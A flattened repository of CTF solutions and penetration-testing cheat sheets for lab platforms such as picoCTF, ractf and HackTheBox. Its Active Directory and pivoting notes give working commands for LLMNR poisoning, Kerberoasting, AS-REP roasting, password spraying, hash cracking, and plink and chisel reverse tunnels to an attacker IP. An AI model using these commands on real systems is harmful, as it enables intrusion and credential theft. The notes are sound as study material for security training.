├── .gitignore ├── CTF ├── PicoCTF │ ├── README.md │ └── TOCHECK.md └── ractf │ ├── 01 │ ├── Mysterious Masquerading Message.md │ ├── SDN.py │ ├── encrypt.txt │ ├── id_rsa │ ├── main.c │ ├── rsa.py │ ├── rsa2.py │ └── teleport.py ├── CheatSheet ├── AD.md ├── Offensive-PS.md ├── Pivoting.md ├── Vuln-scan │ └── openVAS.md ├── cracking.md ├── enum.md ├── etc.md └── kali-setup.md ├── HackTheBox ├── EZ │ ├── arctic.md │ ├── bashed.md │ ├── bastion.md │ ├── beep.md │ ├── blocky.md │ ├── blue.md │ ├── devel.md │ ├── forest.md │ ├── friendzone.md │ ├── grandpa.md │ ├── granny.md │ ├── irked.md │ ├── jerry.md │ ├── lame.md │ ├── legacy.md │ ├── networked.md │ ├── nibbles.md │ ├── openadmin.md │ ├── optimum.md │ ├── popcorn.md │ ├── postman.md │ ├── sense.md │ ├── shocky.md │ ├── swagshop.md │ ├── traverxec.md │ └── valentine.md ├── Hard │ └── brainfuck.md ├── Medium │ ├── b64decode.py │ └── poison.md └── pic │ └── beep.png ├── NOTE ├── Active Directory basic.md ├── Attacking Kerberos.md ├── BurpSuite.md ├── SAMBA.md ├── ad │ ├── README.md │ └── attack_vectors.md ├── exploitation_basic.md ├── pics │ ├── Screenshot 2020-06-09 at 03.35.21.png │ ├── Screenshot 2020-06-18 at 02.39.25.png │ ├── Screenshot 2020-06-18 at 02.51.30.png │ ├── Screenshot 2020-06-18 at 02.55.18.png │ ├── Screenshot 2020-06-18 at 02.56.46.png │ ├── Screenshot 2020-06-18 at 17.09.43.png │ ├── Screenshot 2020-06-21 at 23.46.45.png │ ├── Screenshot 2020-06-25 at 17.33.44.png │ ├── Screenshot 2020-06-25 at 22.31.39.png │ ├── Screenshot 2020-06-25 at 22.32.01.png │ ├── enumerating_ssh.png │ ├── reverse.png │ └── transfer.png ├── recon.md ├── scanning_enumeration.md └── window-privesc │ ├── 1-enumerate.md │ ├── 2-automated-tools.md │ └── 3-kernel-exploitation.md ├── OverTheWire ├── Bandit │ └── README.md └── README.md ├── PortSwigger ├── HTTP Host header attacks.md └── Information disclosure.md ├── README.md ├── TryHackMe ├── Bounty-hacker.md ├── Easy-Peasy.md ├── Easy │ ├── AdventOfCyber │ │ ├── README.md │ │ ├── day16.py │ │ ├── files.zip │ │ ├── final-final-compressed.zip │ │ └── getflag.py │ ├── AdventOfCyber2 │ │ ├── Day1.md │ │ ├── Day10.md │ │ ├── Day11.md │ │ ├── Day12.md │ │ ├── Day13.md │ │ ├── Day14.md │ │ ├── Day2.md │ │ ├── Day3.md │ │ ├── Day4.md │ │ ├── Day5.md │ │ ├── Day7.md │ │ ├── Day8.md │ │ └── Day9.md │ ├── Agent-sudo.md │ ├── Alfred.md │ ├── Anthem.md │ ├── B99.md │ ├── Badbyte1.md │ ├── Blue.md │ ├── Break Out The Cage.md │ ├── CrackTheHash.md │ ├── Hydra.md │ ├── Inclusion.md │ ├── Injection.md │ ├── JuiceShop.md │ ├── Kenobi.md │ ├── LianYu.md │ ├── Linux-Challenges.md │ ├── OWASP-Top-10.md │ ├── OverPass.md │ ├── Overpass-2.md │ ├── Pickle-Rick.md │ ├── Pokemon.md │ ├── PostExploitationBasics.md │ ├── RP: Metasploit.md │ ├── RP:Nmap.md │ ├── Smag-Grotto.md │ ├── Steel-Mountain.md │ ├── XXE.md │ ├── ad.md │ ├── bolt.md │ ├── gamezone.md │ ├── gaming-server.md │ ├── git_happen.md │ ├── ice.md │ ├── kiba.md │ ├── madness_beginner.md │ ├── rootme.md │ ├── skynet.md │ ├── smaggrotto.md │ ├── startup.md │ ├── sudovulnsbof.md │ ├── sudovulnsbypass.md │ ├── tartarus.md │ ├── tomghost.md │ └── vulnUniversity.md ├── Hard │ ├── Daily-Bugle.md │ └── Jack.md ├── Medium │ ├── Anonymous.md │ ├── Blog.md │ ├── BoilerCTF.md │ ├── HackPark.md │ ├── Harder.md │ ├── LinuxPrivEsc │ │ ├── README.md │ │ ├── bash_blackdoor.sh │ │ ├── library_path.c │ │ ├── preload.c │ │ └── spawn_bash.c │ ├── Wonderland.md │ ├── biohazard.md │ ├── ctf100.md │ ├── dogcat.md │ ├── gatekeeper.md │ ├── hackerNote.md │ ├── joker.md │ ├── mr_robot.md │ ├── peakhill.md │ ├── webappsec101.md │ └── wwbuddy.md ├── Throwback │ ├── CORPORATE.LOCAL │ │ ├── ADT01.md │ │ └── DC01.md │ ├── FW01.md │ ├── README.md │ ├── THROWBACK.LOCAL │ │ ├── DC01.md │ │ ├── MAIL.md │ │ ├── PROD.md │ │ ├── TIME.md │ │ └── WS01.md │ ├── pic │ │ └── topo.png │ └── user.md └── pic │ ├── Screenshot 2020-07-01 at 20.27.20.png │ ├── Screenshot 2020-07-01 at 20.29.45.png │ ├── Screenshot 2020-07-01 at 21.51.16.png │ ├── Screenshot 2020-07-04 at 21.44.54.png │ ├── Screenshot 2020-07-04 at 22.26.02.png │ ├── Screenshot 2020-07-05 at 13.22.12.png │ ├── Screenshot 2020-07-05 at 13.25.30.png │ ├── Screenshot 2020-07-05 at 13.27.02.png │ ├── Screenshot 2020-07-05 at 13.39.02.png │ ├── Screenshot 2020-07-14 at 23.43.20.png │ ├── Screenshot 2020-07-14 at 23.43.27.png │ ├── Screenshot 2020-07-14 at 23.43.34.png │ ├── Screenshot 2020-07-14 at 23.43.41.png │ ├── Screenshot 2020-07-17 at 15.09.11.png │ ├── Screenshot 2020-07-17 at 20.40.46.png │ ├── Screenshot 2020-07-18 at 19.57.57.png │ ├── Screenshot 2020-07-18 at 20.20.56.png │ ├── Screenshot 2020-07-27 at 12.32.50.png │ ├── Screenshot 2020-08-01 at 16.16.24.png │ ├── Screenshot 2020-08-01 at 16.27.25.png │ ├── Screenshot 2020-08-01 at 17.25.20.png │ ├── Screenshot 2020-08-07 at 19.42.36.png │ ├── Screenshot 2020-08-07 at 19.43.14.png │ ├── Screenshot 2020-08-08 at 16.44.37.png │ ├── Screenshot 2020-08-19 at 15.47.18.png │ ├── Screenshot 2020-08-20 at 12.51.55.png │ ├── Screenshot 2020-08-20 at 18.06.57.png │ ├── capture-1.png │ ├── pwfeedback-demo.png │ └── sudo-demo.png └── meAndMyGf1 ├── README.md └── pic ├── alice.png ├── button.png ├── home.png ├── html.png ├── profile.png └── target.png /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .code-workspace 3 | 4 | writeUp.code-workspace 5 | 6 | 7 | TryHackMe/AdventOfCyber/final-final-compressed.zip 8 | 9 | TryHackMe/AdventOfCyber/extracted/ 10 | 11 | TryHackMe/AdventOfCyber/final-final-compressed/ 12 | 13 | .vscode/.ropeproject/config.py 14 | 15 | .vscode/.ropeproject/objectdb 16 | 17 | TryHackMe/AdventOfCyber/files.zip 18 | 19 | TryHackMe/AdventOfCyber/files/challenge1 20 | 21 | TryHackMe/AdventOfCyber/files/file1 22 | 23 | TryHackMe/pic/Search | Splunk 8.0.5-filer/ 24 | 25 | TryHackMe/Easy/AdventOfCyber/extracted/ 26 | 27 | TryHackMe/Easy/AdventOfCyber/files/ 28 | 29 | TryHackMe/Easy/AdventOfCyber/final-final-compressed/ 30 | 31 | HackTheBox/Easy/ 32 | 33 | HackTheBox/buff.md 34 | 35 | HackTheBox/docter.md 36 | 37 | CTF/pic/Screenshot 2020-10-07 at 20.50.42.png 38 | 39 | CTF/juicebox.md 40 | -------------------------------------------------------------------------------- /CTF/PicoCTF/README.md: -------------------------------------------------------------------------------- 1 | # Bases 2 | ```console 3 | kuroHat@pico-2019-shell1:~$ echo 'bDNhcm5fdGgzX3IwcDM1' | base64 -d 4 | l3arn_th3_r0p35 5 | ``` 6 | 7 | # Fist grep 8 | ```console 9 | cd /problems/first-grep_1_6788154ca7ee937f569985ff397203b6 10 | kuroHat@pico-2019-shell1:/problems/first-grep_1_6788154ca7ee937f569985ff397203b6$ cat file | grep picoCTF 11 | picoCTF{grep_is_good_to_find_things_205b65d7} 12 | ``` 13 | # dont-use-client-side 14 | ```js 15 | if (checkpass.substring(0, split) == 'pico') { 16 | if (checkpass.substring(split*6, split*7) == 'a60f') { 17 | if (checkpass.substring(split, split*2) == 'CTF{') { 18 | if (checkpass.substring(split*4, split*5) == 'ts_p') { 19 | if (checkpass.substring(split*3, split*4) == 'lien') { 20 | if (checkpass.substring(split*5, split*6) == 'lz_4') { 21 | if (checkpass.substring(split*2, split*3) == 'no_c') { 22 | if (checkpass.substring(split*7, split*8) == '3}') { 23 | alert("Password Verified") 24 | } 25 | } 26 | } 27 | 28 | } 29 | } 30 | } 31 | } 32 | } 33 | ``` 34 | ```picoCTF{no_clients_plz_4a60f3}``` 35 | 36 | -------------------------------------------------------------------------------- /CTF/PicoCTF/TOCHECK.md: -------------------------------------------------------------------------------- 1 | ```console 2 | pidof 3 | pkill 4 | nikto 5 | ``` 6 | 7 | 8 | -------------------------------------------------------------------------------- /CTF/ractf/01: -------------------------------------------------------------------------------- 1 | LHFKM GMRHC FLMMJ ULXFY JOUFC 2 | FQFXF ZJOKP JOMMU LMRJT FFTBA 3 | JYFFR JZFXG AWJCB ULXFI FFKRF 4 | KPGKH RFWCF MTFRR LHFRI FMQFF 5 | KFLWU JMUFC IOMMU FYCFF KWCYB 6 | MFPQF CFHJG KHMJK FFPMJ PFWCY 7 | BMMUF TMJQJ CVJOM GZMUF CFRRJ 8 | TFMUG KHGAA FHLAH JGKHJ KLKPH 9 | FMMUF TLCCF RMFPK JCTLA YMUFW 10 | CYBMJ HCLBU YMFLT QJOAP PJMUG 11 | RIOMM UFYXF LAAPF WGPFP LMMUF 12 | RLTFM GTFMJ HJJKL KOLAA FLXFI 13 | FRMJZ AOWVL HFKMI MUFRF WCFMW 14 | JPFGR PJWOT FKMR -------------------------------------------------------------------------------- /CTF/ractf/Mysterious Masquerading Message.md: -------------------------------------------------------------------------------- 1 | tbbq yhpx:) 2 | 3 | -----BEGIN OPENSSH PRIVATE KEY----- 4 | SWYgeW91IGFyZSByZWFkaW5nIHRoaXMsIHRoZW4geW91IHByb2JhYmx5IGZ 5 | pZ3VyZWQgb3V0IHRoYXQgaXQgd2Fzbid0IGFjdHVhbGx5IGFuIFNTSCBrZX 6 | kgYnV0IGEgZGlzZ3Vpc2UuIFNvIHlvdSBoYXZlIG1hZGUgaXQgdGhpcyBmY 7 | XIgYW5kIGZvciB0aGF0IEkgc2F5IHdlbGwgZG9uZS4gSXQgd2Fzbid0IHZl 8 | cnkgaGFyZCwgdGhhdCBJIGtub3csIGJ1dCBuZXZlcnRoZWxlc3MgeW91IGh 9 | hdmUgc3RpbGwgbWFkZSBpdCBoZXJlIHNvIGNvbmdyYXRzLiBOb3cgeW91IG 10 | FyZSBwcm9iYWJseSByZWFkaW5nIHRoaXMgYW5kIHRoaW5raW5nIGFib3V0I 11 | GFubm95aW5nIHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpcywgYW5kIHlvdSB3 12 | YW50IHRvIHJlYWQgdGhlIHdob2xlIHRoaW5nIHRvIGNoZWNrIGZvciBjbHV 13 | lcywgYnV0IHlvdSBjYW50IGZpbmQgYW55LiBZb3UgYXJlIHN0YXJ0aW5nIH 14 | RvIGdldCBmcnVzdHJhdGVkIGF0IHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpc 15 | yBhcyB0aGV5IHN0aWxsIGhhdmVuJ3QgbWVudGlvbmVkIGFueXRoaW5nIHRv 16 | IGRvIHdpdGggdGhlIGNoYWxsZW5nZSwgZXhjZXB0ICJ3ZWxsIGRvbmUgeW9 17 | 1IGhhdmUgZ290IHRoaXMgZmFyIi4gWW91IHN0YXJ0IHNsYW1taW5nIGRlc2 18 | tzLCBhbmQgc29vbiB0aGUgbW9uaXRvciB3aWxsIGZvbGxvdy4gWW91IGFyZ 19 | SB3b25kZXJpbmcgd2hlcmUgdGhpcyBpcyBnb2luZyBhbmQgcmVhbGlzaW5n 20 | IGl0J3MgY29taW5nIHRvIHRoZSBlbmQgb2YgdGhlIHBhcmFncmFwaCwgYW5 21 | kIHlvdSBtaWdodCBub3QgaGF2ZSBzZWVuIGFueXRoaW5nLiBJIGhhdmUgZ2 22 | l2ZW4geW91IHNvbWUgdGhpbmdzLCBhbHRob3VnaCB5b3Ugd2lsbCBuZWVkI 23 | HNvbWV0aGluZyBlbHNlIGFzIHdlbGwgZ29vZCBsdWNrLiAKNjk2ZTY1NjU2 24 | NDc0NmY2ZjcwNjU2ZTZjNmY2MzZiNzMKNjk2ZTY5NzQ2OTYxNmM2OTczNjE 25 | 3NDY5NmY2ZTMxMzI= 26 | -----END OPENSSH PRIVATE KEY----- 27 | 28 | 29 | 30 | 00111001 00110000 00111001 00111000 00111000 01100011 00111001 01100010 31 | 01100101 01100110 01100101 00110101 01100101 01100001 00110011 01100110 32 | 00110101 01100001 00111001 00110001 01100101 01100110 01100110 01100101 33 | 00110000 00110011 00110000 00110110 00110000 01100001 00111000 00110111 34 | 00110001 00110100 01100100 01100110 01100011 00110010 00110000 00110000 35 | 00111000 00111000 00110100 00110001 00110101 00110101 00110111 00110000 36 | 01100010 00110011 00111001 00110100 01100011 01100101 00111001 01100011 37 | 01100100 00110011 00110010 01100010 01100101 00110111 00110001 00111000 38 | 39 | 90988c9befe5ea3f5a91effe03060a8714dfc20088415570b394ce9cd32be718 40 | 41 | -------------------------------------------------------------------------------- /CTF/ractf/SDN.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/CTF/ractf/SDN.py -------------------------------------------------------------------------------- /CTF/ractf/encrypt.txt: -------------------------------------------------------------------------------- 1 | 90988c9befe5ea3f5a91effe03060a8714dfc20088415570b394ce9cd32be718 -------------------------------------------------------------------------------- /CTF/ractf/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | SWYgeW91IGFyZSByZWFkaW5nIHRoaXMsIHRoZW4geW91IHByb2JhYmx5IGZ 3 | pZ3VyZWQgb3V0IHRoYXQgaXQgd2Fzbid0IGFjdHVhbGx5IGFuIFNTSCBrZX 4 | kgYnV0IGEgZGlzZ3Vpc2UuIFNvIHlvdSBoYXZlIG1hZGUgaXQgdGhpcyBmY 5 | XIgYW5kIGZvciB0aGF0IEkgc2F5IHdlbGwgZG9uZS4gSXQgd2Fzbid0IHZl 6 | cnkgaGFyZCwgdGhhdCBJIGtub3csIGJ1dCBuZXZlcnRoZWxlc3MgeW91IGh 7 | hdmUgc3RpbGwgbWFkZSBpdCBoZXJlIHNvIGNvbmdyYXRzLiBOb3cgeW91IG 8 | FyZSBwcm9iYWJseSByZWFkaW5nIHRoaXMgYW5kIHRoaW5raW5nIGFib3V0I 9 | GFubm95aW5nIHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpcywgYW5kIHlvdSB3 10 | YW50IHRvIHJlYWQgdGhlIHdob2xlIHRoaW5nIHRvIGNoZWNrIGZvciBjbHV 11 | lcywgYnV0IHlvdSBjYW50IGZpbmQgYW55LiBZb3UgYXJlIHN0YXJ0aW5nIH 12 | RvIGdldCBmcnVzdHJhdGVkIGF0IHRoZSBwZXJzb24gd2hvIG1hZGUgdGhpc 13 | yBhcyB0aGV5IHN0aWxsIGhhdmVuJ3QgbWVudGlvbmVkIGFueXRoaW5nIHRv 14 | IGRvIHdpdGggdGhlIGNoYWxsZW5nZSwgZXhjZXB0ICJ3ZWxsIGRvbmUgeW9 15 | 1IGhhdmUgZ290IHRoaXMgZmFyIi4gWW91IHN0YXJ0IHNsYW1taW5nIGRlc2 16 | tzLCBhbmQgc29vbiB0aGUgbW9uaXRvciB3aWxsIGZvbGxvdy4gWW91IGFyZ 17 | SB3b25kZXJpbmcgd2hlcmUgdGhpcyBpcyBnb2luZyBhbmQgcmVhbGlzaW5n 18 | IGl0J3MgY29taW5nIHRvIHRoZSBlbmQgb2YgdGhlIHBhcmFncmFwaCwgYW5 19 | kIHlvdSBtaWdodCBub3QgaGF2ZSBzZWVuIGFueXRoaW5nLiBJIGhhdmUgZ2 20 | l2ZW4geW91IHNvbWUgdGhpbmdzLCBhbHRob3VnaCB5b3Ugd2lsbCBuZWVkI 21 | HNvbWV0aGluZyBlbHNlIGFzIHdlbGwgZ29vZCBsdWNrLiAKNjk2ZTY1NjU2 22 | NDc0NmY2ZjcwNjU2ZTZjNmY2MzZiNzMKNjk2ZTY5NzQ2OTYxNmM2OTczNjE 23 | 3NDY5NmY2ZTMxMzI= 24 | -----END PRIVATE KEY----- -------------------------------------------------------------------------------- /CTF/ractf/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // This challenge should be a fun one! 4 | 5 | // Compile with 6 | // gccmain.c 7 | // then run with 8 | // ./a.out 9 | 10 | 11 | int main() 12 | 13 | { 14 | 15 | int show_the_flag = 0; 16 | 17 | // Pull in the flag using some pre-processor hacks! 18 | 19 | char *flag = 20 | 21 | #include "flag.txt" 22 | 23 | ; 24 | 25 | if (show_the_flag) 26 | 27 | { 28 | 29 | printf( 30 | 31 | flag 32 | 33 | ); 34 | 35 | } 36 | 37 | else 38 | { 39 | while(1) 40 | 41 | { 42 | 43 | printf( 44 | 45 | "Youneedtofindtheflag!" 46 | 47 | ); 48 | 49 | } 50 | 51 | } 52 | 53 | printf( 54 | 55 | "Something went wrong!" 56 | 57 | ); 58 | 59 | return 0; 60 | 61 | } 62 | 63 | -------------------------------------------------------------------------------- /CTF/ractf/rsa.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # p = 12736417496736655442602617267963357620825841853712732906895398885696709839309257918168226091994953634497776446017624975845723070057111835461641254269269317 4 | # q = 12812745834802942067887996082863564857775464236327866229873820064310547028668532363402551825083254446602822350152834784435994127878640673106783300383715213 5 | 6 | # e = 65537 7 | 8 | # ct = 36164077670048236315620165241501158490714780378828495489466034792516124438008544795706435407727196245542440722207946911741455419825341977882668518715641221655547701335758290288192516019599540143387244434109169262921709528678398951068201747253902131176016425711977353198578765688585598616779744281471591815486 9 | 10 | p = 1299811 11 | q = 1299827 12 | 13 | 1416088155477,1187894346607,1187894346607,1012248725317,1642686319107, 1299736156328, 1176348111078, 1566932379421, 976078105770,1041712991086,976078105770,164477670995,1176348111078,1533726616075,457718175500, 766162619069 ] 14 | 15 | def egcd(a, b): 16 | if a == 0: 17 | return (b, 0, 1) 18 | else: 19 | g, y, x = egcd(b % a, a) 20 | return (g, x - (b // a) * y, y) 21 | 22 | def modinv(a, m): 23 | g, x, y = egcd(a, m) 24 | if g != 1: 25 | raise Exception('modular inverse does not exist') 26 | else: 27 | return x % m 28 | 29 | totient = (p - 1) * (q - 1) 30 | n = p * q 31 | # print(n) 32 | d = modinv(e,totient) 33 | m = pow(ct, d, n) 34 | flag = unhex(hex(m)[2:]) 35 | print('hex: '+hex(m)) 36 | print('get only hex code: '+hex(m)[2:]) 37 | print('unhex it: '+flag.decode()) 38 | -------------------------------------------------------------------------------- /CTF/ractf/rsa2.py: -------------------------------------------------------------------------------- 1 | # n = 1209143407476550975641959824312993703149920344437422193042293131572745298662696284279928622412441255652391493241414170537319784298367821654726781089600780498369402167443363862621886943970468819656731959468058528787895569936536904387979815183897568006750131879851263753496120098205966442010445601534305483783759226510120860633770814540166419495817666312474484061885435295870436055727722073738662516644186716532891328742452198364825809508602208516407566578212780807 2 | e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997 3 | ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182 4 | 5 | 6 | #http://factordb.com/index.php?query=58900433780152059829684181006276669633073820320761216330291745734792546625247 7 | 8 | p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307 9 | q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079 10 | from pwn import * 11 | 12 | def egcd(a, b): 13 | if a == 0: 14 | return (b, 0, 1) 15 | else: 16 | g, y, x = egcd(b % a, a) 17 | return (g, x - (b // a) * y, y) 18 | 19 | def modinv(a, m): 20 | g, x, y = egcd(a, m) 21 | if g != 1: 22 | raise Exception('modular inverse does not exist') 23 | else: 24 | return x % m 25 | 26 | n = p*q 27 | totient = (p - 1) * (q - 1) 28 | d = modinv(e,totient) 29 | m = pow(ct, d, n) 30 | 31 | flag = unhex(hex(m)[2:]) 32 | print('plaintext: '+flag.decode()) -------------------------------------------------------------------------------- /CTF/ractf/teleport.py: -------------------------------------------------------------------------------- 1 | import math 2 | 3 | x = 0.0 4 | z = 0.0 5 | flag_x = 10000000000000.0 6 | flag_z = 10000000000000.0 7 | print("Your player is at 0,0") 8 | print("The flag is at 10000000000000, 10000000000000") 9 | print("Enter your next position in the form x,y") 10 | print("You can move a maximum of 10 metres at a time") 11 | for _ in range(100): 12 | print(f"Current position: {x}, {z}") 13 | try: 14 | move = input("Enter next position(maximum distance of 10): ").split(",") 15 | new_x = float(move[0]) 16 | new_z = float(move[1]) 17 | except Exception: 18 | continue 19 | diff_x = new_x - x 20 | diff_z = new_z - z 21 | dist = math.sqrt(diff_x ** 2 + diff_z ** 2) 22 | print(dist) 23 | if dist > 10: 24 | print("You moved too far") 25 | else: 26 | x = new_x 27 | z = new_z 28 | if x == 10000000000000 and z == 10000000000000: 29 | print("ractf{#####################}") 30 | break 31 | 32 | -------------------------------------------------------------------------------- /CheatSheet/AD.md: -------------------------------------------------------------------------------- 1 | # responder 2 | ```console 3 | $ cat /etc/responder/Responder.conf | grep SMB #if OFF change to ON 4 | SMB = ON 5 | $ sudo responder -I tun0 -rdw -v 6 | ``` 7 | - r: switch enables netbios wredir suffix queries 8 | - d: switch enables netbios domain suffix querie 9 | - w: switch starts the wpad rogue proxy server 10 | - v: verbose 11 | 12 | # Attacking Kerberos 13 | ## kerbrute: user enum 14 | ```Console 15 | $ ./kerbrute userenum --dc example.local -d example.local users.txt 16 | ``` 17 | https://github.com/GhostPack/Rubeus 18 | ## Harvesting Tickets 19 | on victim machine 20 | ```powershell 21 | $ ./Rubeus.exe harvest /interval:30 # harvest for TGTs every 30 seconds 22 | ``` 23 | ## Brute-Forcing / Password-Spraying 24 | Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command: ```echo example.local >> C:\Windows\System32\drivers\etc\hosts``` 25 | ```powershell 26 | $ ./Rubeus.exe brute /password: /noticket # This will take a given password and "spray" it against all found users then give the .kirbi TGT for that user 27 | ``` 28 | # Kerberoasting 29 | on kali, `hashcat -m 13100` 30 | ## Rubeus 31 | on victim machine 32 | ```powershell 33 | $ ./Rubeus.exe kerberoast 34 | ``` 35 | ## Impacket 36 | ```console 37 | $ sudo python3 GetUserSPNs.py example.local/username:password -dc-ip $IP -request 38 | ``` 39 | # AS-REP Roasting 40 | on kali, `hashcat -m 18200` 41 | ## Rubeus 42 | on victim machine 43 | ```powershell 44 | $ ./Rubeus.exe asreproast 45 | ``` -------------------------------------------------------------------------------- /CheatSheet/Offensive-PS.md: -------------------------------------------------------------------------------- 1 | # Table of Contents 2 | - [Table of Contents](#table-of-contents) 3 | - [intro](#intro) 4 | - [importing modules](#importing-modules) 5 | - [Get-ADDomain](#get-addomain) 6 | - [Get-ADForest](#get-adforest) 7 | - [Get-ADTrust](#get-adtrust) 8 | - [PowerView](#powerview) 9 | - [Get-NetDomain](#get-netdomain) 10 | - [Get-NetDomainController](#get-netdomaincontroller) 11 | - [Get-NetForest](#get-netforest) 12 | - [Get-NetDomainTrust](#get-netdomaintrust) 13 | 14 | # intro 15 | ## importing modules 16 | start by importing `ActiveDirectory` Module 17 | ``` 18 | Import-Module 19 | Import-Module ActiveDirectory 20 | . .\Module.ps1 21 | ``` 22 | ## Get-ADDomain 23 | - list all of the Domain Controllers for a given environment, tell you the NetBIOS Domain name, the FQDN (Fully Qualified Domain name) 24 | ``` 25 | Get-ADDomain 26 | Get-ADDomain | Select-Object NetBIOSName, DNSRoot, InfrastructureMaster # filtering 27 | ``` 28 | ## Get-ADForest 29 | pulls all the Domains within a Forest and lists them out to the user. This may be useful if a bidirectional trust is setup, it may allow you to gain a foothold in another domain on the LAN. Just like Get-ADDomain 30 | ``` 31 | Get-ADForest 32 | Get-ADForest | Select-Object Domains 33 | ``` 34 | ## Get-ADTrust 35 | Get-ADTrust provides a ton of information about the Trusts within the AD Domain. It can tell you if it’s a one way or bidirectional trust, who the source is, who the target is, and much more. 36 | ``` 37 | Get-ADTrust -Filter * | Select-Object Direction,Source,Target 38 | ``` 39 | # PowerView 40 | - https://github.com/PowerShellMafia/PowerSploit 41 | - kali: `/usr/share/windows-resources/powersploit` 42 | ```console 43 | $ Import-Module .\PowerView.ps1 44 | ``` 45 | ## Get-NetDomain 46 | Basic info such as the Forest, Domain Controllers, and Domain Name are enumerated. 47 | ```console 48 | $ Get-NetDomain 49 | ``` 50 | ## Get-NetDomainController 51 | list all of the Domain Controllers within the network. This is incredibly useful for initial reconnaissance, especially if you do not have a Windows device that’s joined to the domain. 52 | ```console 53 | $ Get-NetDomainController 54 | ``` 55 | ## Get-NetForest 56 | It provides all the associated Domains, the root domain, as well as the Domain Controllers for the root domain. 57 | ```console 58 | $ Get-NetForest 59 | ``` 60 | ## Get-NetDomainTrust 61 | Get-NetDomainTrust is similar to Get-ADTrust with our SelectObject filter applied to it. It’s short, sweet and to the point! 62 | ```console 63 | $ Get-NetDomainTrust 64 | ``` -------------------------------------------------------------------------------- /CheatSheet/Pivoting.md: -------------------------------------------------------------------------------- 1 | # msfconsole 2 | * meterpreter session is requried 3 | ## Auto-Routing 4 | ``` 5 | background 6 | use post/multi/manage/autoroute 7 | set SESSION X 8 | set SUBNET x.x.x.0 9 | exploit 10 | ``` 11 | ## Setting up a Proxy 12 | 1. use `auxiliary/server/socks4a` 13 | 2. (optional) Change you port, you can either keep the default 1080 port or change it to an open port of your choice. 14 | 3. `run` 15 | 16 | # Proxy Chain 17 | 1. sudo nano /etc/proxychains.conf > socks4 socks4 127.0.0.1 18 | 1. the same port that you specify when `auxiliary/server/socks4a` 19 | 2. now run `proxychains ` 20 | 21 | # plink.exe 22 | ``` 23 | plink.exe -ssh -l kali -pw kali -N -R 10.10.14.43:8888:127.0.0.1:8888 10.10.14.43 24 | ``` 25 | 26 | # chisel.exe 27 | ``` 28 | ./chisel.exe client 10.10.14.43:8080 R:8888:127.0.0.1:8888 29 | ./chisel.exe client 10.10.14.43:8888 R:8888:127.0.0.1:8888 30 | ./chisel client 10.10.14.43:8080 R:8888:127.0.0.1:8888 31 | ``` -------------------------------------------------------------------------------- /CheatSheet/Vuln-scan/openVAS.md: -------------------------------------------------------------------------------- 1 | # installing 2 | ```console 3 | root@kali:~# apt-get update 4 | root@kali:~# apt-get dist-upgrade 5 | root@kali:~# sudo apt install gvm -y # sudo apt install openvas -y 6 | root@kali:~# sudo gvm-setup 7 | ``` 8 | **user admin:password is create here, copy ur password and save it somewhere** 9 | 10 | Once gvm-setup completes its process, the OpenVAS manager, scanner, and GSAD services should be listening: 11 | ```console 12 | root@kali:~# netstat -antp # should shows the output below 13 | Active Internet connections (servers and established) 14 | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 15 | tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd 16 | tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai 17 | tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad 18 | ``` 19 | # using 20 | ``` 21 | root@kali:~# openvas-start 22 | root@kali:~# openvas-stop 23 | ``` 24 | 25 | gvmd --create-user=kali --password=kali --role=Admin 26 | 27 | - resource 28 | - [installing](https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/) 29 | - https://dannyda.com/2020/08/07/how-to-fix-openvas-command-not-found-in-kali-linux-2020-2a/ 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /CheatSheet/cracking.md: -------------------------------------------------------------------------------- 1 | # Colabcat 2 | [youtube](https://www.youtube.com/watch?v=pYOncitu7W8) guide how to use this tool. here is what you need to do 3 | 1. Click on `Runtime`, `Change runtime type`, and set `Hardware accelerator` to GPU. 4 | 2. Go to your Google Drive and create a directory called `dothashcat`, with a `hashes` subdirectory where you can store hashes. 5 | 3. Upload [rule](https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule) and your hashes in `hashes` subdirectory. 6 | 4. Come back to Google Colab, click on `Runtime` and then `Run all`. 7 | 5. When it asks for a Google Drive *token*, go to the link it provides and authenticate with your Google Account to get the token 8 | 6. add code cell (`+code`) 9 | 7. run `!bash` and press play button 10 | 8. `cd drive/'My Drive'/dothashcat/hashes` and run hashcat 11 | 12 | # Hashcat 13 | ```console 14 | $ hashcat -m -a 0 -o crack.txt 'hash' /usr/share/wordlists/rockyou.txt --force 15 | $ hashcat -m 13100 -a 0 hash.txt Pass.txt --force # kerberos 16 | ``` 17 | # john 18 | ```console 19 | root@kali:~# john -wordlist=/usr/share/wordlists/rockyou.txt 20 | ``` 21 | -------------------------------------------------------------------------------- /CheatSheet/enum.md: -------------------------------------------------------------------------------- 1 | # Tools 2 | - linpeas.sh 3 | - suid3num.py 4 | - pspy 5 | - ltrace 6 | - enum4linux 7 | 8 | 9 | # links 10 | - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 11 | 